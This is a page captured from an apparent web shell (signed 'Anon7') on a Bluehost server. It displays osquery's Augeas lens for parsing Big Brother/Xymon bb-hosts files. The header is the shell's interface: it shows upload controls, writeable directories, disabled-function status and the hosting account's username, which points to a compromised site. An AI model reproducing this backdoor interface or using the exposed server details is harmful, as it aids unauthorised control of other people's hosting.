KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache
System : Linux cs317.bluehost.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : andertr9 ( 1047)
PHP Version : 8.2.18
Disable Function : NONE
Directory :  /opt/osquery/share/osquery/lenses/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/osquery/share/osquery/lenses/bbhosts.aug
(* BB-hosts module for Augeas                 *)
(* Author: Raphael Pinson <raphink@gmail.com> *)
(*                                            *)
(* Supported :                                *)
(*                                            *)
(* Todo :                                     *)
(*                                            *)

module BBhosts =
    autoload xfm

    (* Define useful shortcuts *)

    let eol = Util.eol
    let eol_no_spc = Util.del_str "\n"
    let sep_spc = Sep.space
    let sep_opt_spc = Sep.opt_space
    let word  = store /[^|;# \n\t]+/
    let value_to_eol = store /[^ \t][^\n]+/
    let ip    = store Rx.ipv4
    let url   = store /https?:[^# \n\t]+/
    let word_cont = store /[^;# \n\t]+/

    (* Define comments and empty lines *)
    let comment = Util.comment
    let empty   = Util.empty


    (* Define host *)
    let host_ip   = [ label "ip" . ip ]
    let host_fqdn = [ label "fqdn" . sep_spc . word ]

    let host_test_url  = [ label "url" . url ]
    let host_test_cont (kw:string) = [ store /!?/ . key kw .
                             (Util.del_str ";" .
                                [ label "url" . word_cont ] .
			        (Util.del_str ";" . [ label "keyword" . word ])?
			     )?
			     ]

    (* DOWNTIME=[columns:]day:starttime:endtime:cause[,day:starttime:endtime:cause] *)
    let host_test_downtime =
          let probe = [ label "probe" . store (Rx.word | "*") ]
      in let probes = Build.opt_list probe Sep.comma
      in let day = [ label "day" . store (Rx.word | "*") ]
      in let starttime = [ label "starttime" . store Rx.integer ]
      in let endtime = [ label "endtime" . store Rx.integer ]
      in let cause = [ label "cause" . Util.del_str "\"" . store /[^"]*/ . Util.del_str "\"" ]
      in [ key "DOWNTIME" . Sep.equal
          . (probes . Sep.colon)?
          . day . Sep.colon
          . starttime . Sep.colon
          . endtime . Sep.colon
          . cause
          ]

    let host_test_flag_value = [ label "value" . Util.del_str ":"
                              . store Rx.word ]

    let host_test_flag (kw:regexp) = [ store /!?/ . key kw
                                     . host_test_flag_value? ]

    let host_test = host_test_cont "cont"
		  | host_test_cont "contInsecure"
		  | host_test_cont "dns"
		  | host_test_flag "BBDISPLAY"
		  | host_test_flag "BBNET"
		  | host_test_flag "BBPAGER"
		  | host_test_flag "CDB"
		  | host_test_flag "GTM"
		  | host_test_flag "XYMON"
		  | host_test_flag "ajp13"
		  | host_test_flag "bbd"
		  | host_test_flag "clamd"
		  | host_test_flag "cupsd"
		  | host_test_flag "front"
		  | host_test_flag /ftps?/
		  | host_test_flag /imap[2-4s]?/
		  | host_test_flag /ldaps?/
		  | host_test_flag /nntps?/
		  | host_test_flag "noconn"
		  | host_test_flag "nocont"
		  | host_test_flag "noping"
		  | host_test_flag "notrends"
		  | host_test_flag "oratns"
		  | host_test_flag /pop-?[2-3]?s?/
		  | host_test_flag "qmqp"
		  | host_test_flag "qmtp"
		  | host_test_flag "rsync"
		  | host_test_flag /smtps?/
		  | host_test_flag "spamd"
		  | host_test_flag /ssh[1-2]?/
		  | host_test_flag /telnets?/
		  | host_test_flag "vnc"
		  | host_test_url
		  | host_test_downtime

    let host_test_list = Build.opt_list host_test sep_spc

    let host_opts = [ label "probes" . sep_spc . Util.del_str "#" . (sep_opt_spc . host_test_list)? ]

    let host = [ label "host" . host_ip . host_fqdn . host_opts . eol ]

    (* Define group-compress and group-only *)
    let group_compress = [ key /group(-compress)?/ . (sep_spc . value_to_eol)? . eol_no_spc .
                  ( comment | empty | host)*
		  ]

    let group_only_col  = [ label "col" . word ]
    let group_only_cols = sep_spc . group_only_col . ( Util.del_str "|" . group_only_col )*
    let group_only      = [ key "group-only" . group_only_cols . sep_spc . value_to_eol . eol_no_spc .
                  ( comment | empty | host)*
		  ]


    (* Define page *)
    let page_title = [ label "title" . sep_spc . value_to_eol ]
    let page = [ key "page" . sep_spc . word . page_title? . eol_no_spc .
                  ( comment | empty | host )* . ( group_compress | group_only )*
		  ]


    (* Define lens *)

    let lns = (comment | empty)* . page*

    let filter = incl "/etc/bb/bb-hosts"

    let xfm = transform lns filter


Anon7 - 2021